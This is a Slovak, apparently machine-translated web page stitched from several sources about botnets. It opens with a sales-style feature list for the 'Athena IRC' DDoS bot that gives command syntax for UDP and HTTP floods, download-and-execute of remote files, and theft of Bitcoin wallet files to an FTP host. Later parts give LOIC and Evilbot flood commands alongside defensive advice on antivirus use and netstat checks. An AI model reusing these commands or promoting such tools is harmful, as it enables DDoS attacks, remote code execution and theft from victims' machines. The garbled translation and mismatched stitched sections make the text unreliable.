Botnet. Ako sa vytvárajú botnety

Athena IRC je stabilný DDoS bot kódovaný v C++ (nulové závislosti) ideálny na infikovanie a stádo Windows strojov. Tento robot obsahuje niektoré z najlepších a najpokročilejších taktík DDoS dostupných na trhu, ktoré zničia webový server, herné servery, servery TeamSpeak / VoIP, domáce pripojenia atď. ľahko. Je odolný voči botkilingu a zabije väčšinu ostatných dostupných robotov.
Robot je vybavený:
- Botkiller je schopný zničiť roboty ako Andromeda, Zeus, SpyEye, Insomniac, SmokeLoader, ngrBot atď.
- 11 metód DDoS, rovnaké taktiky používané v AthenaIRC (niektoré z najsilnejších taktík DDoS dostupných na trhu)
- Vstavaná overovacia webová stránka, ktorá používa roboty, nie nepodobné hyperspin.com alebo just-ping.com
- smartview / normálne zobrazenie / skryté zobrazenie (z náhodného existujúceho prehliadača)
- Podrobné štatistiky o každom robotovi
- Stiahnuť / aktualizovať / odinštalovať
- Shell príkazy(lebo nikdy nevieš)
Poznámka: Zásobník nie je FUD.

Príkazy/Funkcie: (Vo svojej téme môžete nastaviť ktorúkoľvek z nich – roboty analyzujú príkaz na pripojenie)
DDoS príkazy
[Port 80 je najbežnejší pre webové stránky]
! UDP – odosiela obrovské množstvá náhodných paketov cieľovému hostiteľovi/IP, ideálne pre domáce pripojenia (SYNTAX: UDP hostiteľ/IP čas portu!) [Použite „0“ na zaplavenie náhodných portov]
! Condis - Rýchle pripojenie/odpojenie od záplavy, odstraňuje hry (t.j. CSS) a TeamSpeak/VoIP servery ako omáčka (SYNTAX: condis host/ip time port)
! HttpGet – Rýchlo odošle každú sekundu stovky požiadaviek HTTP GET od každého robota
! HttpPost – Robí stovky HTTP POST požiadaviek od každého robota a udržuje pripojenie pomalé na zverejňovanie obsahu
Zaregistrujte sa hosting ←
Príkazy Flood IRC War
! RPI - Pripojte sa k IRC a zaplavte cieľ (#kanál alebo používateľa) pomocou súpravy rôzne metódy chatovanie na IRC. (Syntax: irc irc.server.net 6667 180 nick/č. kanála)
! Anope - Vrstva 7 IRC DDoS. Nezáleží na tom, či skrytý IRC sieťový rozbočovač chráni službu, stále môžu byť ddos ​​na aplikačnej vrstve. Tento útok zrúti službu Anope. (Syntax: Anope irc.server.net 6667 180)
Rôzne príkazy botov
! ID – zobrazuje verziu robota a toho, kto má licenciu
! Ping – vráti čas pingbota k jeho aktuálnemu pripojeniu
! OpenURL – otvorí webovú stránku v predvolenom prehliadači (syntax: OpenURL http://website.com!)
! Openurlhidden – otvorí skrytú webovú stránku internet Explorer(SYNTAX: openurlhidden http://website.com!)
! Blockurl – vytvorí riadok v súbore hostiteľov počítača, ktorý zakáže prístup k určenému hostiteľovi (SYNTAX: blockurl website.com)
! dlexec – Stiahnite a spustite súbor z adresy URL (SYNTAX: dlexec http://website.com/program.exe!)
! - Aktualizujte stiahnutie a kliknite na uvedený odkaz. Bot sa po úspešnom spustení vymaže (syntax: updatehttp://website.com/file.exe)
! Odstrániť – vymaže robota a odstráni všetky jeho stopy
Zlodeji
! Btcwallet – bot prehľadá v počítači peňaženku wallet.dat (BTC) a nahrá ju na FTP podľa vášho výberu (SYNTAX: btcwallet ftphost.com user123 pass123)
Príkazy IRC
! Raw – odosiela nespracované príkazy na server (SYNTAX: raw PRIVMSG #channel: správa!)
! Zapnutie/vypnutie ticha – prepína výstup robota (prepísané príkazom raw!)
! Pripojiť sa - pripojí sa k robotovi ku kanálu (SYNTAX: pripojte sa k #kanálu!)
! - Podrobnosti o robotovi z kanála (! SYNTAX: súčasť #kanálu)
! Newnick - Zmeňte prezývku robota pomocou nového náhodného čísla a mena
! Randnick zap./vyp. – prepínajte medzi náhodnými názvami robotov (Samantha58385) a informáciami na základe názvu robota (ABCDE)
! Opätovné pripojenie – Pokusy o opätovné pripojenie k aktuálnemu IRC serveru/sieti a kanálu po odpojení na 20 sekúnd

Botnet alebo sieť botov je počítačová sieť pozostávajúca z veľkého počtu počítačov, na ktorých je tajne nainštalovaný malvér, čo útočníkom umožňuje vykonávať akékoľvek akcie na diaľku pomocou výpočtových zdrojov infikovaných strojov. Stovky alebo dokonca tisíce infikovaných počítačov sa zvyčajne používajú na nelegálne a škodlivé aktivity – posielanie spamu, vírusov, kradnutie osobných údajov alebo vykonávanie DDoS útokov. Dnes sú botnety považované za jednu z najvážnejších kybernetických hrozieb.

Ako sa objavujú botnety?

Aby sa váš počítač stal súčasťou botnetu, musí byť infikovaný špecializovaným malvérom, ktorý udržiava kontakt so vzdialeným serverom alebo iným infikovaným zariadením, čím dostáva pokyny na akciu od útočníkov, ktorí tento botnet ovládajú. Okrem samotnej veľkosti infekcie sa malvér používaný na vytváranie botnetov v zásade príliš nelíši od tradičného malvéru.

Ako rozpoznať botnet?

Malvér typický pre botnety možno zistiť rovnakým spôsobom ako všetky ostatné malvéry. Nepriamymi príznakmi môžu byť pomalá prevádzka, zvláštne správanie, chybové hlásenia alebo náhle spustenie chladiaceho ventilátora, keď je počítač v pohotovostnom režime. Toto sú možné príznaky, že niekto vzdialene používa váš počítač ako súčasť rozvetveného botnetu.

Ako odstrániť počítač z botnetu?

Ak chcete odstrániť počítač z botnetu, musíte odstrániť malvér, ktorý útočníci používajú diaľkové ovládanie za ním. najviac efektívnym spôsobom je antivírusová kontrola vášho počítačového systému, ktorá vám pomôže odhaliť malvér a odstrániť ho z vášho počítača.

Ako sa vyhnúť infekcii malvérom špecifickým pre botnet:
Ďalšie spôsoby ochrany pred rizikom, že sa stanete súčasťou botnetu:

Ak chcete chrániť svoj počítač pred rizikom, že sa stanete jedným zo „zombie“ v armáde botnetov, snažte sa vyhnúť akémukoľvek podozrivému sťahovaniu. Neklikajte na odkazy ani neotvárajte prílohy e-mailov, ktorých odosielateľov nepoznáte, a buďte maximálne opatrní pri inštalácii softvéru tretích strán do počítača. Udržujte softvér tretích strán aktuálny a nainštalujte všetky najnovšie aktualizácie operačný systém. Najdôležitejšie je však použitie moderného a kvalitného antivírusová ochrana, Napríklad, antivírus Avast ktorý poskytne spoľahlivú ochranu počítač pred všetkými typmi malvéru a pomôže vám zabrániť infikovaniu vášho počítača a jeho zahrnutiu do botnetu.

Dnes sa botnety stali jedným z hlavných nástrojov kyberzločincov. ComputerBild vám povie, čo sú to botnety, ako fungujú a ako ochrániť váš počítač, aby sa nedostal do siete zombie.

Botnet alebo zombie sieť je sieť infikovaných počítačov malvér, ktorý útočníkom umožňuje na diaľku ovládať stroje iných ľudí bez vedomia ich vlastníkov. IN posledné roky zombie siete sa stali stabilným zdrojom príjmov pre kyberzločincov. Neustále nízke náklady a minimálne znalosti potrebné na správu botnetov prispievajú k rastu popularity, a tým aj počtu botnetov. DDoS útoky alebo spamové korešpondencie realizované pomocou zombie sietí, útočníci a ich zákazníci zarábajú tisíce dolárov.

Je môj počítač napadnutý robotom?

Na túto otázku nie je ľahké odpovedať. Faktom je, že je takmer nemožné sledovať zásah robotov do každodennej prevádzky počítača, pretože to žiadnym spôsobom neovplyvňuje výkon systému. Existuje však niekoľko znakov, podľa ktorých môžete určiť, že v systéme je prítomný robot:

Neznáme programy sa pokúšajú pripojiť na internet, čo je pravidelne rozhorčene hlásené bránou firewall alebo antivírusovým softvérom;

Internetový prenos je veľmi vysoký, hoci web používate veľmi mierne;

Nové procesy sa objavia v zozname spustených systémových procesov, ktoré sa tvária ako bežné procesy Windows (napríklad bot sa môže nazývať scvhost.exe – tento názov je veľmi podobný názvu systému Proces Windows svchost.exe Je ťažké zistiť rozdiel, ale je to možné.

Prečo vznikajú botnety?

Botnety sú vytvorené na zarábanie peňazí. Existuje niekoľko oblastí komerčne životaschopného využitia zombie sietí: DDoS útoky, harvesting dôverné informácie, spamovanie, phishing, spam vo vyhľadávačoch, podvádzanie počítadla kliknutí atď. Treba poznamenať, že akýkoľvek smer bude ziskový, bez ohľadu na to, čo si útočník vyberie, a botnet vám umožňuje vykonávať všetky vyššie uvedené činnosti súčasne.

DDoS útok (z anglického Distributed Denial-of-Service) je útok na počítačový systém, napríklad na webovú stránku, ktorej cieľom je priviesť systém do „pádu“, teda do stavu, kedy už nemôže prijímať a spracovávať požiadavky od legitímnych používateľov. Jednou z najbežnejších metód vykonania DDoS útoku je odoslanie viacerých požiadaviek na počítač alebo stránku obete, čo vedie k odmietnutiu služby, ak zdroje napadnutého počítača nestačia na spracovanie všetkých prichádzajúcich požiadaviek. Útoky DDoS sú pre hackerov impozantnou zbraňou a botnet je dokonalým nástrojom na ich vykonanie.

DDoS útoky môžu byť prostriedkom nekalej súťaže a kyberterorizmu. Majiteľ botnetu môže poskytnúť službu každému podnikateľovi, ktorý nie je príliš škrupulózny - vykonať DDoS útok na webovú stránku svojho konkurenta. Napadnutý zdroj po takomto zaťažení „spadne“, zákazník útoku získa dočasnú výhodu a kyberzločinec dostane miernu (alebo nie takú) odmenu.

Rovnakým spôsobom môžu samotní majitelia botnetov využívať DDoS útoky na vymáhanie peňazí od veľkých spoločností. Spoločnosti zároveň uprednostňujú dodržiavanie požiadaviek kyberzločincov, keďže odstraňovanie následkov úspešných DDoS útokov je veľmi nákladné. Napríklad v januári 2009 bol GoDaddy.com, jeden z najväčších hostiteľov, vystavený DDoS útoku, v dôsledku ktorého boli tisíce stránok hostených na jeho serveroch takmer jeden deň nedostupné. Finančné straty hostiteľa boli obrovské.

Vo februári 2007 bola vykonaná séria útokov na koreňové DNS servery, ktorých prevádzka priamo ovplyvňuje normálne fungovanie celého internetu. Je nepravdepodobné, že účelom týchto útokov bol kolaps World Wide Web, pretože existencia zombie sietí je možná len za podmienky, že internet existuje a funguje normálne. Predovšetkým to bolo ako demonštrácia sily a schopností zombie sietí.

Reklama na služby na implementáciu DDoS útokov je otvorene zverejnená na mnohých fórach na príslušné témy. Ceny za útoky sa pohybujú od 50 do niekoľko tisíc dolárov za deň nepretržitej prevádzky botnetu DDoS. Podľa stránky www.shadowserver.org došlo v roku 2008 k približne 190 000 DDoS útokom, na ktorých mohli kyberzločinci zarobiť približne 20 miliónov dolárov. Prirodzene, táto suma nezahŕňa príjem z vydierania, ktorý sa jednoducho nedá vypočítať.

Zhromažďovanie dôverných informácií

Dôverné informácie, ktoré sú uložené v počítačoch používateľov, budú vždy priťahovať votrelcov. Najzaujímavejšie sú čísla kreditné karty, finančné informácie a heslá k rôznym službám: poštové schránky, FTP servery, instant messenger atď. Moderný malvér zároveň umožňuje útočníkom vybrať si presne tie dáta, ktoré ich zaujímajú – stačí si stiahnuť príslušný modul do svojho PC.

Útočníci môžu ukradnuté informácie buď predať, alebo ich využiť vo svoj prospech. Na mnohých fórach na webe sa denne objavujú stovky reklám na predaj bankových účtov. Náklady na účet závisia od množstva peňazí na účte používateľa a pohybujú sa od 1 do 1 500 USD na účet. Spodná hranica naznačuje, že v priebehu hospodárskej súťaže sú počítačoví zločinci zapojení do tohto druhu podnikania nútení znižovať ceny. Aby naozaj zarobili veľa peňazí, potrebujú stály prílev čerstvých dát, a to si vyžaduje neustály rast zombie sietí. Kartári sa zaujímajú najmä o finančné informácie – votrelci zapojení do falšovania bankové karty.

Ako rentabilné takéto operácie možno posúdiť známa história so skupinou brazílskych kyberzločincov, ktorých zatkli pred dvoma rokmi. Pomocou informácií ukradnutých z počítačov dokázali z bankových účtov bežných používateľov vybrať 4,74 milióna dolárov. O získanie osobných údajov, ktoré priamo nesúvisia s peniazmi používateľa, majú záujem aj zločinci, ktorí sa zaoberajú falšovaním dokumentov, otváraním falošných bankových účtov, nezákonnými transakciami atď.

Adresy sú ďalším typom informácií, ktoré zhromažďujú botnety. Email a na rozdiel od čísel kreditných kariet a účtov možno z adresára jedného infikovaného počítača extrahovať veľa e-mailových adries. Zhromaždené adresy sú ponúkané na predaj a niekedy "podľa hmotnosti" - za megabajt. Hlavnými kupujúcimi takéhoto „produktu“ sú spameri. Zoznam milióna e-mailových adries stojí od 20 do 100 dolárov a odosielanie odosielaných spamerov na rovnaký milión adries stojí 150 až 200 dolárov. Prínos je zrejmý.

Záujem majú aj zločinci účty rôzne platených služieb a online obchodoch. Sú určite lacnejšie ako bankové účty, no ich realizácia je spojená s nižším rizikom šikany zo strany orgánov činných v trestnom konaní.

Každý deň kolujú po svete milióny spamových správ. Posielanie nevyžiadanej pošty je jednou z hlavných funkcií moderných botnetov. Podľa Kaspersky Lab sa asi 80 % všetkého spamu posiela cez siete zombie. Z počítačov používateľov, ktorí dodržiavajú zákony, sa posielajú miliardy listov s reklamami na Viagru, kópie drahých hodiniek, online kasína atď., ktoré upchávajú komunikačné kanály a poštové schránky. Hackeri tak ohrozujú počítače nevinných používateľov: adresy, z ktorých sa posiela pošta, sú na čiernej listine antivírusových spoločností.

V posledných rokoch sa rozsah spamových služieb rozšíril: objavil sa spam ICQ, spam v sociálnych sieťach, fóra, blogy. A to je tiež „zásluha“ vlastníkov botnetov: koniec koncov, nie je ťažké pridať do klienta botov ďalší modul, ktorý otvára horizonty pre nové podnikanie so sloganmi ako „Spam na Facebooku. Lacné." Ceny spamu sa líšia v závislosti od cieľové publikum a počet adries, na ktoré sa zasielanie uskutočňuje. Rozsah cien za cielenú korešpondenciu je od 70 USD za státisíce adries do 1 000 USD za niekoľko desiatok miliónov adries. Za posledný rok spameri zarobili posielaním e-mailov približne 780 miliónov dolárov.

Generovať vyhľadávací spam

Ďalšou možnosťou využitia botnetov je zvýšenie popularity stránok vo vyhľadávačoch. Pri práci na optimalizácii pre vyhľadávače sa správcovia zdrojov snažia zvýšiť pozíciu stránky vo výsledkoch vyhľadávania, pretože čím je vyššia, tým viac návštevníkov príde na stránku cez vyhľadávače a teda o to väčší je príjem majiteľa stránky napríklad z predaja reklamného priestoru na webových stránkach. Mnoho spoločností platí webmasterom veľa peňazí, aby stránku dostali na prvé miesto vo „vyhľadávačkách“. Majitelia botnetov špehovali niektoré z ich trikov a zautomatizovali proces optimalizácie pre vyhľadávače.

Keď v komentároch k vášmu príspevku v LiveJournal alebo vydarenej fotografii uverejnenej na fotohostingu uvidíte množstvo odkazov vytvorených vám neznámou osobou a niekedy aj vaším „priateľom“ – nečudujte sa: niekto si práve objednal propagácia ich zdroja pre botnet vlastníkov. Špeciálne vytvorený program sa načíta do zombie počítača a v mene svojho majiteľa zanecháva komentáre k obľúbeným zdrojom s odkazmi na propagovanú stránku. Priemerná cena za nelegálne vyhľadávacie spamové služby je približne 300 dolárov mesačne.

Koľko stoja osobné údaje

Náklady na ukradnuté osobné údaje priamo závisia od krajiny, v ktorej žije ich právoplatný vlastník. Napríklad úplné údaje obyvateľa USA stoja 5-8 USD. Na čiernom trhu sa cenia najmä údaje od obyvateľov Európskej únie – sú dva až trikrát drahšie ako údaje od občanov Spojených štátov a Kanady. Dá sa to vysvetliť tým, že zločinci môžu takéto údaje použiť v ktorejkoľvek krajine, ktorá je súčasťou EÚ. Priemerná cena kompletného dátového balíka o jednej osobe na celom svete je približne 7 dolárov.

Bohužiaľ, pre niekoho, kto sa rozhodol zorganizovať botnet od nuly, nebude ťažké nájsť na internete návod na vytvorenie zombie siete. Prvý krok: vytvorte novú sieť zombie. Ak to chcete urobiť, musíte infikovať počítače používateľov špeciálnym programom - botom. Na infikovanie sa používajú spamové korešpondencie, uverejňovanie správ na fórach a sociálnych sieťach a iné metódy; bot je často vybavený funkciou samošírenia, ako sú vírusy alebo červy.

Na prinútenie potenciálnej obete nainštalovať robota sa používajú techniky sociálneho inžinierstva. Ponúkajú napríklad sledovanie zaujímavého videa, ktoré si vyžaduje stiahnutie špeciálneho kodeku. Po stiahnutí a spustení takéhoto súboru používateľ, samozrejme, nebude môcť sledovať žiadne video a s najväčšou pravdepodobnosťou si vôbec nevšimne žiadne zmeny a jeho počítač bude infikovaný a stane sa pokorným sluhom, ktorý vykonáva všetky príkazy majstra botnetu.

Druhou široko používanou metódou infekcie botmi je sťahovanie pomocou pohonu. Keď používateľ navštívi infikovanú webovú stránku na svojom počítači cez rôzne „diery“ v aplikáciách – predovšetkým v populárnych prehliadačoch – škodlivý kód. Používa sa na využitie slabých stránok špeciálne programy- vykorisťuje. Umožňujú nielen tiché sťahovanie, ale aj tiché spustenie vírusu alebo bota. Tento typ distribúcie malvéru je najnebezpečnejší, pretože ak je populárny zdroj napadnutý, nakazia sa desiatky tisíc používateľov!

Bot môže byť vybavený funkciou vlastného šírenia počítačové siete. Môže sa napríklad šíriť infikovaním všetkých dostupných spustiteľných súborov alebo vyhľadávaním a infikovaním zraniteľných sieťových počítačov.

Infikované počítače nič netušiacich používateľov môže tvorca botnetu ovládať pomocou príkazového centra botnetu, kontaktovaním robotov cez kanál IRC, webové pripojenie alebo akékoľvek iné dostupné prostriedky. Stačí spojiť niekoľko desiatok strojov do siete, aby botnet začal generovať príjem pre svojho majiteľa. Navyše tento príjem je lineárna závislosť o udržateľnosti siete zombie a rýchlosti jej rastu.

Reklamné spoločnosti pôsobiace online podľa schémy PPC (Pay-per-Click) platia peniaze za jedinečné kliknutia na odkazy na reklamy zverejnené na internete. Pre majiteľov botnetov je podvádzanie takýchto spoločností lukratívny biznis. Vezmite si ako príklad známu sieť Google AdSense. Inzerenti v ňom zahrnutí platia Googlu za kliknutia na umiestnené reklamy v nádeji, že používateľ, ktorý sa pozrel „na svetlo“, si od nich niečo kúpi.

Google zasa umiestňuje kontextovú reklamu na rôzne stránky zapojené do programu AdSense, pričom vlastníkovi stránky platí určité percento z každého kliknutia. Bohužiaľ, nie všetci vlastníci stránok sú čestní. Pomocou siete zombie môže hacker generovať tisíce jedinečných kliknutí denne, jedno z každého počítača, bez toho, aby vzbudil podozrenie spoločnosti Google. Peniaze vynaložené na reklamnú kampaň tak potečú do vrecka hackera. Žiaľ, zatiaľ sa nevyskytol ani jeden prípad, že by sa za takéto činy niekto zodpovedal. Podľa Click Forensics bolo v roku 2008 asi 16 – 17 % všetkých kliknutí na reklamné odkazy falošných, z ktorých minimálne tretinu generovali botnety. Vykonaním niekoľkých jednoduchých výpočtov môžete pochopiť, že minulý rok majitelia botnetov „klikli“ na 33 000 000 dolárov. Dobrý príjem z kliknutí myšou!

Útočníci a nečestní podnikatelia nemusia sami vytvárať botnet od nuly. Od hackerov si môžu kúpiť alebo prenajať botnety rôznych veľkostí a výkonu – napríklad kontaktovaním špecializovaných fór.

Náklady na hotový botnet, ako aj náklady na jeho prenájom priamo závisia od počtu počítačov, ktoré sú v ňom zahrnuté. Hotové botnety sú najobľúbenejšie na fórach v anglickom jazyku.

Malé botnety, ktoré pozostávajú z niekoľkých stoviek robotov, stoja medzi 200 a 700 USD. Zároveň je priemerná cena jedného bota asi 50 centov. Väčšie botnety stoja viac peňazí.

Sieť Shadow zombie, ktorú vytvoril pred niekoľkými rokmi 19-ročný hacker z Holandska, mala viac ako 100 000 počítačov rozmiestnených po celom svete a predávala sa za 25 000 eur. Za tieto peniaze si môžete kúpiť malý domček v Španielsku, no zločinec z Brazílie si radšej kúpil botnet.

Nástroje na ochranu pred botnetmi

1. V prvom rade sú to antivírusové programy a komplexné balíčky na ochranu pred internetovými hrozbami s pravidelne aktualizovanými databázami. Pomôžu nielen včas odhaliť nebezpečenstvo, ale ho aj eliminovať skôr, než váš verný „železný priateľ“ premenený na zombie začne posielať spam alebo „zahadzovať“ stránky. Komplexné balíky ako Kaspersky internetová bezpečnosť 2009, obsahujú kompletnú sadu bezpečnostných funkcií, ktoré je možné spravovať prostredníctvom spoločného riadiaceho centra.

Antivírusový modul v pozadie vykoná skenovanie najdôležitejších systémové oblasti a všetko riadi možné spôsoby Vírusové prieniky: e-mailové prílohy a potenciálne nebezpečné webové stránky.

Firewall monitoruje komunikáciu medzi osobný počítač a internet. Kontroluje všetky dátové pakety prijaté zo siete alebo odoslané do siete a v prípade potreby ich zablokuje sieťové útoky a zabraňuje tajnému odosielaniu osobných údajov na internet.

Spamový filter chráni Poštová schránka z prieniku reklamných správ. Medzi jeho úlohy patrí aj detekcia phishingových e-mailov, pomocou ktorých sa útočníci snažia z používateľa vydolovať informácie o jeho údajoch na prihlásenie do online platobných alebo bankových systémov.

2. Pravidelné aktualizácie operačného systému, webových prehliadačov a iných aplikácií, ktorých vývojári objavujú a odstraňujú mnohé medzery v ich ochrane, ako aj slabiny využívané útočníkmi.

3. Špeciálne šifrovacie programy ochránia vaše osobné údaje, aj keď bot už prenikol do počítača, pretože na prístup k nim bude musieť prelomiť heslo.

4. Zdravý rozum a opatrnosť. Ak chcete chrániť svoje údaje pred rôznymi druhmi hrozieb, nemali by ste sťahovať a inštalovať programy neznámeho pôvodu, otvárať archívy so súbormi v rozpore s antivírusovými upozorneniami, navštevovať stránky, ktoré prehliadač označí ako nebezpečné atď.

Ďakujeme spoločnosti Kaspersky Lab za pomoc pri príprave materiálu

LOIC je program, ktorý zabezpečuje aktiváciu DDoS útoku na webovú stránku alebo server. Tento nástroj bol pôvodne vytvorený na kontrolu ochrany, ktorá je na ňom. Program je určený na spúšťanie DDOS útokov a funguje ako špeciálny nástroj, takže ho používajte len na experimentovanie.

Program má prístup k zdrojovému kódu. V prípade potreby si stiahnite ďalšie materiály zo služby SourceForge. Program je v zdroji označený ako malvér. Pri sťahovaní Low Orbit Ion Cannon nezabudnite, že ho používate na vlastné riziko.

Princíp činnosti

Program sa vstrekne do servera a vykoná viacúrovňový útok, čím otvorí veľa spojení so serverom. Potom "LOIC" preruší server a dosiahne chybový kód, ktorý znamená "víťazstvo". K zlyhaniu servera dochádza v sériovom režime. V okne programu sa zobrazujú podrobné štatistiky o dostupných chybách na serveri a jeho výkone.

Pri „hacknutí servera“ útokmi DDoS uvidíte údaje o aktívnych pripojeniach. Tieto parametre sa počas útoku neustále menia. Tiež vidíte správy o kóde, ktorý sa vracia zo servera a pokúša sa k nemu pripojiť v štandardnom režime.

Pomôcka funguje v štandardnom režime s použitím bežných nástrojov a metód hackerstva. LOIC „hádže“ spam do požiadaviek HTTP a spôsobí poruchu zariadenia. LOIC je distribuovaný v štandardnej verzii, ako aj v útočnej verzii prostredníctvom spravodajských kanálov a komunikačných programov. Druhá verzia programu bude vyhovovať tvorcom botnetov.

Rozhranie

Všetky funkcie, ktoré sú v programe LOIC sú umiestnené na jednom paneli. Zadaním adresy servera alebo adresy IP na útok sa zobrazí zoznam dostupné pripojenia. GUI jednoduché a intuitívne, ale v shellu nie je žiadna ruská lokalizácia. Takéto nástroje často nie sú preložené do ruštiny.

Kľúčové vlastnosti

  • nástroj „hackne“ server, zaútočí a dosiahne na ňom zlyhanie hardvéru;
  • program má jednoduché rozhranie, ktoré je vytvorené v režime jedného okna;
  • LOIC odosiela spam vo forme požiadaviek HTTP a iných paketov;
  • rozhranie má zdroj s otvorený prístup, ktorý je vytvorený v programovacom jazyku C#;
  • "cracker" funguje na zostavách OS Windows starý generácie;
  • Program beží na bezplatnej licencii.

IRC boti sa stávajú nástrojom pre DDOS útoky. Unixové stroje už nie sú
sú potrebné pre DOS útoky (pravdepodobne máte programy ako TFN, Trin00, ktoré fungujú na *nix-s), všetko sa už stalo oveľa jednoduchšie.

Teraz akýkoľvek Windows stroj, môžete zavesiť svojho robota, ktorý sa dá ľahko nastaviť a spravovať. Útoky sú riadené z kanála, ku ktorému sa pripájajú roboty. Po príchode na kanál robot jednoducho „sedí a čaká“ na príkazy majiteľa. Zvyčajne také
kanály sú buď tajné, alebo chránené heslom, takže iba ich vlastník môže vstúpiť do kanála a ovládať činnosť robota.

Tento spôsob DDOS útokov má však jednu obrovskú nevýhodu: obeť môže zistiť server, kanál a heslo k nemu. To môže viesť k tomu, že jednoducho „ukradne“ vašu armádu robotov. Tomu sa však dá predísť pokynom robotov, aby sa pripojili k rôznym serverom, takže sledovanie všetkých robotov na všetkých serveroch bude mať veľké hemoroidy (predstavte si, že tucet robotov sa pripojí k prvému kanálu, tucet k druhému atď. – to je dosť ťažké vypočítať VŠETKY roboty v takejto situácii).

Ako boti zaútočia na obeť?

Rozdiel medzi DOS a DDOS útoky je obrovský: zatiaľ čo útok DOS sa vykonáva pomocou známej diery v systéme, útok DDOS zaplaví počítač z rôznych hostiteľov nezmyselnými paketmi, čo spomaľuje schopnosť systému prijímať a spracovávať údaje.
je mimoriadne ťažké brániť. DDOS IRC roboty bežiace na Win9x posielajú UDP a ICMP
pakety (teda ping), pokiaľ ide o maximálny počet odchádzajúcich priepustnosť hostiteľ.

Existujú roboty, ktoré dokážu generovať oveľa nebezpečnejšie pakety, ktoré prerušia synchronizáciu pripojenia TCP (TCP Syn/Ack), ale takéto útoky nemožno vykonať z hostiteľov s Win9x. Zvyčajne sú takéto roboty nainštalované na Win2K/XP -
len tam sú všetky potrebné prostriedky. Môžu spôsobiť, že útok na webový server je veľmi zložitý a ťažko blokovateľný: UDP a ICMP môžu byť stále nejakým spôsobom filtrované poskytovateľom a nemôžu ovplyvniť kvalitu služieb, ale TCP pakety nemožno zakázať bez ovplyvnenia prevádzky. Keď je TCP zakázaný, zvyčajne to znamená, že server nemôže správne poskytovať webové a ftp služby.

Existujú hotové roboty napísané špeciálne pre použitie v prostredí Win2k a WinXP (napr. Evilbot alebo Slackbot 1.0). Práve s pomocou Evilbota" bol grc.com zaplavený. Samotný bot je malý súbor (veľkosť 10-16 kb), ktorý obeť spustí na svojom počítači, po ktorom sa bot zaregistruje v adresári Windows (napr. príklad: \Windows\WinRun2. exe) Pri každom spustení sa robot zaregistruje v sekcii automatického spustenia v registri:
HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\Run\ a vyzerá asi takto:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinRun. Evilbot nikdy neprepíše svoje súbory, ale iba sa prepíše v registri, kde uvedie cestu k svojmu adresáru.

Potom sa robot pokúsi pripojiť ku konkrétnemu IRC serveru, ide tam a ticho sedí na kanáli a čaká na príkazy. Paralelne on
pripojí k inému serveru, odkiaľ stiahne trójskeho koňa, spustí ho takto: "update.ur.address./thepath.exe". Ak bol robot prvý, kto vstúpil do neregistrovaného kanála, okamžite predvolene umiestni mod + nstk. Evilbot počúva každú osobu prítomnú na kanáli (a Slackbot 1.0 žiada heslo). Môže byť prikázaný ping na konkrétneho hostiteľa: "!udp 101.105.201.212 1000 0", kde 1000 je počet paketov a 0 na konci je časové oneskorenie medzi paketmi.
Ping Evilbot“ a je nasledujúci:

P4
Odošle 10 000 64 kB paketov ping na konkrétnu IP adresu
!p3< ip жертвы >
Odošle 1 000 64 kB paketov ping na konkrétnu IP adresu
!p2< ip жертвы >
Pošle 100 64 kbajtových ping paketov na konkrétnu IP adresu
!p1< ip жертвы >
Odošle 10 64 kbajtových ping paketov na konkrétnu IP

Počet pingov a ich veľkosť sa môže meniť – napríklad príkaz !p4 odošle 15 000 32-bajtových ICMP paketov na zadanú ip.

Ako zistím, či je v mojom systéme robot?

Niektoré antivírusy nevidia roboty v systéme, ale môžu byť detekované manuálne kontrolou počítača, či nemá neoprávnené pripojenie IRC. Môžete len skontrolovať všetko sieťové pripojenia: netstat -an | nájsť ":6667"

Ak vám potvrdí aktívne pripojenie, je možné, že váš počítač je infikovaný. Nezaškodí pozrieť si aj iné porty, ktoré IRC často používa.
Tu sa môžete pozrieť do registra a skontrolovať nové podozrivé zmeny:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. Ak nájdete kľúč označujúci prítomnosť robota, odstráňte ho, reštartujte počítač a odstráňte škaredého robota.



Načítava...
Hore